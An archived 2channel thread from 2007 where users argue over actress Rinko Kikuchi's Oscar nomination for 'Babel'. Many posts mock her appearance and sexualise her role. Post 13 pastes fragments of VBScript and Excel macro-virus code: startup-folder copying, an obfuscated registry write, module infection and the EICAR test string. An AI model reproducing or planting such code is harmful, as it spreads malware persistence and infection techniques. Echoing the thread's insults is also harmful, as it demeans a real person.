2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【がっかり四天王?】菊地凛子

1 :名無しさん@お腹いっぱい。:2007/01/28(日) 11:08:15 ID:sVVQkE8u0
ないから立ててみる事にしよう

公式 ttp://www.anore.co.jp/rinko/

バベル ttp://babel.gyao.jp/
ttp://marmotfarm.com/cgi-bin/upload2/source/up88319.jpg
ttp://lint.s1.x-beat.com/up/img/up11836.jpg

これがアレなら三大がっかりじゃなくて四天王となるんだが

2 :名無しさん@お腹いっぱい。:2007/01/28(日) 11:20:12 ID:PCB7CtSCO
ウチの会社に、
ずっと菊地凛子ファン、と名乗る奴がいるのだが、
凛子は、
上野樹里主演の「笑うミカエル」に出ていたと思うのだが、
「アカデミー賞候補女優がそんなマイナーな映画に出るはずない」と言い張る。

俺はたまたま「笑うミカエル」観たのだが、勘違いか?

3 :名無しさん@お腹いっぱい。:2007/01/28(日) 11:23:20 ID:sVVQkE8u0
でてる
ttp://www.michael-movie.com/


4 :名無しさん@お腹いっぱい。:2007/01/28(日) 11:39:16 ID:nRMLVLaXO
かなり浮かれてるね
勘違いして天狗にならなきゃいいけど…


5 :名無しさん@お腹いっぱい。:2007/01/28(日) 11:41:31 ID:sVVQkE8u0
何でノミネートされたのかがわからん

6 :名無しさん@お腹いっぱい。:2007/01/28(日) 12:44:41 ID:sVVQkE8u0
 

7 :名無しさん@お腹いっぱい。:2007/01/28(日) 13:08:59 ID:qGmgv3bqO
脱いだからノミネートされただけ

8 :名無しさん@お腹いっぱい。:2007/01/28(日) 14:23:38 ID:sVVQkE8u0
>>7
そういう理由なら
アメリカの女優さんの方が脱ぎっぷりはいいんだけどねw

9 :名無しさん@お腹いっぱい。:2007/01/28(日) 14:57:31 ID:eOU/eP1zO
若くみせるために増量し、耳の聞こえない役だから、一年間そういう学校に行ったとか???
トムハンクス並とか言われてた。
知らんけど

10 :名無しさん@お腹いっぱい。:2007/01/28(日) 17:34:08 ID:rwKclxglO
菊地気持ち悪いよ菊地。汚い猥褻シーンで得意になって日本の恥。そんなにやりたけりゃAVに出ればいいじゃんね!

11 :名無しさん@お腹いっぱい。:2007/01/28(日) 18:53:00 ID:PCB7CtSCO
トンクス。
やっぱミカエル出てたな。

ま、自慢にはならんが。

12 :名無しさん@お腹いっぱい。:2007/01/28(日) 18:59:16 ID:2cOnp0H30
芋虫淋子

13 :名無しさん@お腹いっぱい。:2007/01/28(日) 20:44:09 ID:RZnlepKu0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


14 :名無しさん@お腹いっぱい。:2007/01/29(月) 00:44:20 ID:ED072LmNO
アメリカもわざわざ未成年の障害者の猥褻シーンをノミネートしてくるなんてひどいね。そんな事されて喜んでる日本の芸能人達と、得意げにやってしまった菊地は温過ぎる…

15 :名無しさん@お腹いっぱい。:2007/01/29(月) 01:09:50 ID:/iflR8L30
わざわざって、各賞総なめですが。批評家が皆同じ精神構造ってこと?


16 :名無しさん@お腹いっぱい。:2007/01/29(月) 01:16:49 ID:/iflR8L30

ブラッド・ピット「彼女は素晴らしい(とんでもない、普通じゃない)。
驚かされる。撮影以来彼女の話で持ちきりだ・・。」
「凛子は誉めざるを得ない才能の持主だ。」

イニャリトゥ監督「彼女を選んだことは、僕がこれまでしてきた判断の中で、
特に良い決断だった。」

LA市民の声「素晴らしかった。彼女の心の痛みが伝わってきた。」
「役を見事に演じていた。”心の葛藤”を上手く表現していた。」





17 :名無しさん@お腹いっぱい。:2007/01/29(月) 01:19:20 ID:ED072LmNO
という内輪受け。

18 :名無しさん@お腹いっぱい。:2007/01/29(月) 01:28:14 ID:/iflR8L30
>そんな事されて喜んでる日本の芸能人達と

それ逆w日本の「ゲイノージン」及び「ゲイノーカイ」が最も打撃を
くらったんだろ。日本で無名だった女優が頭越しに世界のセレブになった
わけでw
おまえら嘘なんだよ、談合なんだよといわれちゃったようなもので。
不愉快極まりないせいか、TVもまー扱い小さいねw
大手事務所の圧力もあんだろうしw


19 :名無しさん@お腹いっぱい。:2007/01/29(月) 02:04:00 ID:/iflR8L30
今日「アッコにおまかせ」を見てて、今週の出来事でなんてコメントするのかと
思ったら、スルーだったよw一切なし

でも番組内で映画の話題は二つ取り上げてた。「ドロロ」の封切りと、石原真理子
の映画のオーディションのネタW

”49年ぶりに日本女優がアカデミー賞ノミネート”の話題に一切触れず。
これが日本のゲイノーカイの力学であります。

20 :名無しさん@お腹いっぱい。:2007/01/29(月) 02:17:52 ID:9IGEr6r10
野球界の野茂みたいな扱いだな。
DHよしこ
が良かったので俺は応援する。

21 :名無しさん@お腹いっぱい。:2007/01/29(月) 19:32:40 ID:xwnqCMFf0
>>15
アメリカだけでなくカンヌでも評判良かった。
それにオスカー会員は批評家ではなく監督、俳優、他映画関係者の中の功労者の集まり。
ノミネートされたってことは映画界のプロにも評価されてるってこと。

22 :名無しさん@お腹いっぱい。:2007/01/31(水) 01:48:05 ID:GgpRwZx/O
裸の王様。

23 :名無しさん@お腹いっぱい。:2007/01/31(水) 02:54:50 ID:QhOsdBi40
ジョディー・フォスターやブルック・シールズは14、15でフルヌード
(はっきりいってロリ向け作品)。だがそんな理由でノミネートされねぇよ。
そして菊地は今いくつだよ。

おまいらのセンス、朝鮮の田舎のおっさんみたいだなw

24 :名無しさん@お腹いっぱい。:2007/01/31(水) 03:26:48 ID:GgpRwZx/O
朝鮮の田舎て!差別のニュアンスですかね?さすがハイセンスなコメントありがとうございました…。


25 :名無しさん@お腹いっぱい。:2007/01/31(水) 16:57:29 ID:kK/ZeNai0
アメリカマスコミで叩かれまくりだね
「歩く埃みたい」だってw



26 :名無しさん@お腹いっぱい。:2007/01/31(水) 23:09:03 ID:3bPIULAO0
誉められる人は叩かれる

27 :名無しさん@お腹いっぱい。:2007/02/01(木) 01:16:03 ID:F7MKv0wAO
ともいうけれど、菊地凛子の場合は。。。

日本の恥orz

28 :名無しさん@お腹いっぱい。:2007/02/02(金) 00:22:29 ID:k19B/45u0
叩かれてるの、赤絨毯のファッションについてだろ?
そんなつまんない事どーでもいいよ。それはそれで面白いんだし。

29 :名無しさん@お腹いっぱい。:2007/02/02(金) 00:48:28 ID:Rv9qA/1Z0
とりあえず、恥ずかしいファッションと金髪はやめてほしい。
美人だと勘違いしないで欲しい。

30 :名無しさん@お腹いっぱい。:2007/02/02(金) 02:54:12 ID:k19B/45u0
地元紙が、映画「バベル」でのリンコは素晴らしいが、あのファッションは
最低。埃があるいてるようだ・・・こういうのは、まー定番、お約束。
双方わかってて、その話題で盛り上げる。ワーストなんたらってね。
古くはマドンナ、トラボルタ、スタローンとか。そういうことも業界盛り上げ
の一環なのさ。

31 :名無しさん@お腹いっぱい。:2007/02/02(金) 04:38:51 ID:WgCKCVJ1O
この程度の女優に日本のマスコミは騒ぎ過ぎだよね。

32 :名無しさん@お腹いっぱい。:2007/02/02(金) 08:44:46 ID:XO3Idxz3O
別に彼女の味方をする訳ではないが
国内より先に海外で評価された人をやっかむのは島国根性の現れなんだろうな
カッコ良くないよ。
彼女の評価については
作品見てないからなんとも言えません。

33 :名無しさん@お腹いっぱい。:2007/02/02(金) 18:18:00 ID:NBmLFYu1O
私はバベル出る前から菊地ダメ派ですが、今まで菊地凛子知らなかった人が多いんですね。それでも一瞬TVに映っただけでこれだけ皆に不快感を与えるなんて、凄い。もはや公害。


34 :名無しさん@お腹いっぱい。:2007/02/03(土) 01:41:25 ID:4sH5NZsm0
>>33
力入りすぎ

35 :名無しさん@お腹いっぱい。:2007/02/03(土) 03:13:51 ID:wS7qIyfkO
みんなヌードのことばっかり言ってるけど、そんなとこより手話が凄いと思った。
聾唖者って顔と手話で表現するじゃん?
凛子も口をへの字にしたり、表情が良かったよ
まあアンダーヘアーとオパーイも凄いけど

36 :名無しさん@お腹いっぱい。:2007/02/04(日) 01:33:41 ID:odWxZ/kBO
菊地さんはもともとすっごいへの字口なのw。それに下ぶくれだから金太郎さんみたいだけど、全体的には老け顔だね。それが幼稚キャラと釣り合ってなくて、気持ち悪いんだよね。

37 :名無しさん@お腹いっぱい。:2007/02/04(日) 11:31:19 ID:BXBeqwbX0
ウサギ男だぴょん

38 :名無しさん@お腹いっぱい。:2007/02/04(日) 18:22:54 ID:GyTmrDHn0
菊池程度でも運次第でイケる。それが米ショウビズ界。
続け、日本の若手女優たちよ!

39 :名無しさん@お腹いっぱい。:2007/02/05(月) 03:06:10 ID:2jmIYu010
「空の穴」見て思ったが、この人にはやはり独特な空気感、存在感はあるね。
間を生かせる芝居というか、引力・磁力といおうか?
山瀬まみの口調でパワーは吉田日出子、みたいな独特のものが。
役に入り方が深いからだろう。

確かに何かがアンバランスで、そこがまた興味深い。小さくまとまっていない。
とても”面白い”人だと思う。

40 :名無しさん@お腹いっぱい。:2007/02/05(月) 03:53:33 ID:Smm9+HHqO
もう2、3作品じっくり演技見てみないと評価できないな
チョイ役ばっかでわからん

41 :名無しさん@お腹いっぱい。:2007/02/05(月) 15:11:35 ID:HwNVORDD0
金太郎ブス女。演技以前に女として色気皆無では、商売にならんね。

42 :名無しさん@お腹いっぱい。:2007/02/05(月) 16:21:24 ID:XDMXJYqwO
まじまじと顔見るとやっぱ顔酷い

43 :名無しさん@お腹いっぱい。:2007/02/06(火) 06:27:05 ID:EQqiV/UAO
>>39『空の穴』いい映画だったのに、菊地の違和感でぶち壊しでしたよ?確に山瀬まみさんも個性的な話し方ですが、可愛い童顔や利発さと合っていて調和がとれていると思います。引合に出されるのは可哀想。


44 :名無しさん@お腹いっぱい。:2007/02/06(火) 23:43:52 ID:Q3cJ1W4D0
>>22
ばか
まじまじ見なきゃわからないのか

45 :名無しさん@お腹いっぱい。:2007/02/07(水) 03:08:21 ID:G53/6z/p0
>>43
彼女に何かあんの? アンタいろんなとこに必死で書いてるでしょw

人の意見は意見。アンタのそれも一個の意見だし、オレや
新人・菊地百合子の演技を当時評価してた批評家のそれも、一つの意見。
勿論アカデミー賞やゴールデングローブ賞ノミネートを選考した人々の意見も、
一つの意見。感じ方の違いだろ。

46 :名無しさん@お腹いっぱい。:2007/02/07(水) 04:28:52 ID:xeoNijyF0
この人西川口のソープ状でつか?

47 :名無しさん@お腹いっぱい。:2007/02/07(水) 21:16:12 ID:5REDW3470
>>43の寺島進ヲタきもい。
彼女だった菊地に嫉妬してるんだろ?


48 :名無しさん@お腹いっぱい。:2007/02/09(金) 20:43:06 ID:KWkDyz900
IMDb見てきたけどThe Brothers Bloomの話ってホントなんだな。
レイチェル・ワイズとエイドリアン・ブロディと共演か〜

49 :名無しさん@お腹いっぱい。:2007/02/10(土) 02:55:49 ID:hlFBmZ2e0
菊リンデス

50 :名無しさん@お腹いっぱい。:2007/02/11(日) 00:02:15 ID:ztG3cw910
「空の穴」は秀作。熊切の演出と寺島進の素晴らしい演技はもちろんの事
もう一方の主演・菊地の空気感のある、生々しい演技と存在感に追う所は大。
ほとんど二人しか出てないので、菊地の芝居がダメなら映画としてこれは成立
しない。
ほぼ新人ながら、寺島の超絶ナチュラル演技と対等に渡り合ってる凛子の才能は
凄いと思われる。

51 :名無しさん@お腹いっぱい。:2007/02/11(日) 01:14:20 ID:b8ERdBe10
日本ではいまいちだからダメモトでハリウッドに挑戦したら
偶然当たったと判断したら良いのかな?

52 :名無しさん@お腹いっぱい。:2007/02/11(日) 01:30:42 ID:ztG3cw910
宝クジじゃあるまいし、当たる当たらないって話じゃないでしょ。

イニャリトゥ作品の主演級となれば、1000倍かの競争率なわけで。
約1年かけての厳密なオーディション。
その作品自体が世界市場で認められるかられないかも、何十倍かの競争率。
その中で個人としてオスカーにノミネートされるなんてさらにその数十倍の高い壁。

でなければ、これだけ日本人女優がハリウッド映画に出演していながら、半世紀
ぶりノミネートなんてありえない。当たる当たらないであるわけない。

53 :名無しさん@お腹いっぱい。:2007/02/11(日) 01:32:30 ID:ac7h0DiE0
野球で言うと大家みたいなもんか。

54 :名無しさん@お腹いっぱい。:2007/02/11(日) 01:57:58 ID:BAVfG3U+0
>>53
分かり易い例えだねwww

55 :名無しさん@お腹いっぱい。:2007/02/11(日) 02:23:58 ID:ztG3cw910
野球でいう大家が50年ぶりにメジャーで活躍した日本選手ならそういえるけど、
そうじゃないだろw
実際には死ぬほど世界に認められたい日本のトップスターがゴマンといて、でも
ほとんど撃墜。死死累々。


56 :名無しさん@お腹いっぱい。:2007/02/11(日) 02:37:14 ID:ztG3cw910
矢沢永吉 ピンクレディー 松田聖子 ドリカム 宇多田 島田陽子 
工藤夕貴 最近の若手女優
みんな世界の壁の前には撃沈w どんなに事務所が努力して働きかけようが。。

そこを、個人の力でポンと突破しちゃったの、菊池。

57 :名無しさん@お腹いっぱい。:2007/02/11(日) 04:24:05 ID:dGSyTdpVO
まあ究極の一発屋だな
数年後には工藤夕貴以下の存在になって日本に戻ってきそうな雰囲気
がっかり菊地イラネ

58 :名無しさん@お腹いっぱい。:2007/02/11(日) 06:10:14 ID:ztG3cw910
仮に一発屋だとしても歴史に残るので、御の字だろう。
100年に二人なんてノーベル賞の比じゃねぇぞ。講演だけで食ってけるとかの世界。

59 :名無しさん@お腹いっぱい。:2007/02/11(日) 06:17:19 ID:ztG3cw910
でも、この先数年は引く手あまただろうし、イニャリトゥも今後使う公算
大きい。あの入れ込みようからみて。

60 :名無しさん@お腹いっぱい。:2007/02/11(日) 07:00:04 ID:/79t1LXy0
>>59
あんた、もしかして寝ずにずっと悪口書き込まれないか見張ってたのか?w


61 :名無しさん@お腹いっぱい。:2007/02/11(日) 12:43:11 ID:U/VWPPde0
ずいぶん肯定意見が増えたと思いきや全てID:ztG3cw910か・・・
自分はまだ観ていないから女優としての評価はなんともいえないけど。
ビジュアル面の美しさで売ってるわけではないし、
これをきっかけに今後活躍できるならそれはそれでいいんじゃないの?
自分としてはアカデミー賞というブランドにあまり魅力は感じない。

日本人が活躍できないのは言語の壁が大きいよね。
英語が必修なのにほとんどの日本人が英語しゃべれないなんて異常。
(自分も例外ではない・・それでもテストの点数は結構取れていたW)

今回の彼女の役柄は英語力を必要としていないみたいだから
次の作品での評価がどうなるかで一発かどうかが決まりそうな気がする。
ネイティブの発音ができるようには、非常に難しいだろうから、
今後も役柄が限定されることはしかたないだろう。

まあ、勝手ながら思うのは。
公の場での金髪と濃すぎるメイクはやめてくれ。ってこった。

62 :名無しさん@お腹いっぱい。:2007/02/12(月) 05:08:10 ID:X4HUfWvX0
>>58
ノーベル賞程の世界貢献してねえだろ。
ただ単に目立ちたくて自己萬オナに演技してるだけだろw

63 :名無しさん@お腹いっぱい。:2007/02/13(火) 07:03:43 ID:/3ztsQBZO
>>60>>61
ホントだ、すごい。肯定意見は全部cw930だ。見張ってるの?!


64 :名無しさん@お腹いっぱい。:2007/02/13(火) 07:05:06 ID:/3ztsQBZO
間違えました!cw910だった

65 :名無しさん@お腹いっぱい。:2007/02/13(火) 07:18:26 ID:/3ztsQBZO
>>15>>16>>18とかも?
肯定意見は1名だったんだ…
もしかして主!?、ではないですね。がっかり四天王と書いてあるし。まいっか。

66 :名無しさん@お腹いっぱい。:2007/02/15(木) 01:23:25 ID:5FFvA9V/O
そして誰もいなくなった。

67 :名無しさん@お腹いっぱい。:2007/02/15(木) 09:25:02 ID:UvpdiVzy0
土屋アンナの金髪は許せるのに
この人のが許せないのはなぜだろう・・

68 :名無しさん@お腹いっぱい。:2007/02/15(木) 15:45:34 ID:dOacktBr0
>>67
土屋アンナの方が許せないわ〜w
あいつの勘違い発言
「私には生まれながらのrockの血が流れてる」
こいつ何って感じなんだけど。

69 :名無しさん@お腹いっぱい。:2007/02/17(土) 18:13:04 ID:we5ltFoQ0
>>68ロックじゃなくて80年代のファッションセンスの血でしょ
子供いて離婚って頭悪いからできる芸当
褒めるとこないから離婚してさらに磨きがかかったとかわけの
わからんこと言われてた

>>59深夜起きてたらそんなこともあるだろな 笑
リンコが手話やったりとか努力家なのは認めるけど
それイコールすごい役者ではない
演技なんかやっぱり日本人だしビギンズのおっさんのほうも
たまたま最近日本ブームでだれがやってもある程度取り上げられるだけ
タケシなんかそれカンチガイして二作目だして賞の会場ドン引き

70 :名無しさん@お腹いっぱい。:2007/02/17(土) 18:53:44 ID:c30ebP+DO
ヌードになったからノミネートされたんだろ

71 :名無しさん@お腹いっぱい。:2007/02/17(土) 22:14:49 ID:4UX1+VQHO
手話ぐらい私でも勉強している。元々興味はあったけど、ボランティアのためだ。
障害を面白がって貶める様な映画作らないでください


72 :名無しさん@お腹いっぱい。:2007/02/17(土) 23:13:17 ID:c30ebP+DO
障害者でも性に目覚めるってことを伝えたかったのかな?

73 :名無しさん@お腹いっぱい。:2007/02/20(火) 10:21:23 ID:wKbntrJdO
事務所どこですか?

74 :名無しさん@お腹いっぱい。:2007/02/20(火) 13:22:36 ID:xE8MqYYT0
                   ,,ニ―、 
                   <~~}_ ゙〉
                   レ゙"゙'/ 
                    ヽ/゙\ 
              ,-‐、_,ノ ゙゙̄ir::::::::::::l
            /  ヾ   /-、:::::::::|
            //   ゙)7_/::::::::l::::::::/
          //   /   l゙:::::::::レ"7
         /  l、__,/゙",,-‐i::::::::/ ,/l
        ,/   に二ニ__,l/ ‐" ,/::::|
       /〜〜、、__ ノ  ヾ、_/-"::::;;/[ 
       》l     〈   /::::::::ー-"" ゙〉
      / ヽヾ   l  /:::::::::::::::::::::::::::/
      <__\   \lー--i\:::::::::::〈
     /  / ゙̄ー―-、(_,/  ゙、;;;;__/i
    /、_〉/    \ ゙l |:::::゙l   〈、,,__,ゝ   
   /  /      /__,〈 l:::::::〉   ヽ:::::::l
   l' /       l  | |:::::/    l:::::::|
  / /        ヾ l |:::::l      |:::::|
 〈___(         ゙l | l::::〈      ゙lレ::l  
  L__二フ        | _l ゙ー]    /\'ノ
             (____,ゝ   ∠__/

75 :名無しさん@お腹いっぱい。:2007/02/20(火) 19:54:04 ID:QDFLdvLj0
↑俺の胸で泣きな……か?

76 :名無しさん@お腹いっぱい。:2007/02/20(火) 21:15:21 ID:3+0IJGdzO
がっかり四天王でも筆頭だよ

77 :名無しさん@お腹いっぱい。:2007/02/20(火) 21:47:36 ID:kqQy6B1GO
>>72…なんか『バベル』なだけに、言語ではわかり合えないが…言語の壁を超えてみれば人間は、みたいな?日本では障害者の女子高生まで性の対象にするんだ、気持ち悪、ではないらしいんですが…


78 :名無しさん@お腹いっぱい。:2007/02/20(火) 21:52:06 ID:kqQy6B1GO
日本の♂は風俗好きと思われてるとこもあるし(買春旅行とか)、女はすぐヤラせるし、高校生は制服で売春、汚い国というイメージもあるんじゃない?失礼しちゃう

79 :名無しさん@お腹いっぱい。:2007/02/21(水) 19:49:03 ID:r2gCnyDb0
バベル。まともな感覚の人が観れば、軽い人種差別を感じるらしい。
日本の描写がひどすぎる。海外に留学中の人は、現地の人で「日本人の女って簡単に
やらせてくれるんだね。」と映画観て、あらためて納得している人が多くて、
非常に悔しいと言っている。
日本の恥だよ、この映画。

80 :名無しさん@お腹いっぱい。:2007/02/22(木) 00:34:46 ID:PU64DYqe0
半分事実だから仕方がない。
すくなくともここ10年は

81 :名無しさん@お腹いっぱい。:2007/02/22(木) 18:44:34 ID:eyVnAnb/O
次回作が決まるだけでもすごいね・・小雪でも後に続く作品がなかったのに

82 :名無しさん@お腹いっぱい。:2007/02/22(木) 23:13:59 ID:Gbc7eIfZ0
>>37
作品がすごくても可愛くなけりゃ残れない。
ソレが日本の芸能界

83 :名無しさん@お腹いっぱい。:2007/02/23(金) 00:28:54 ID:bGks+CI/O
小雪だからオファーがつづかなかったんだよ

84 :名無しさん@お腹いっぱい。:2007/02/23(金) 01:21:57 ID:KOQCXDBOO
お前らみんながっかりチンコのくせに彼女ばっかり責めんなよ

85 :名無しさん@お腹いっぱい。:2007/02/23(金) 02:14:32 ID:zc+90OH7O
そうだそうだ
もっと言えー

86 :山本モナ:2007/02/23(金) 21:48:11 ID:UmJ1/ujcO
凛子は消えるわよ。あんな歪んだ顔じゃ無理よね。パンツ脱いで体はった演技が世界で評価するくらいなら、ハリウッドも終りよ。

22 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)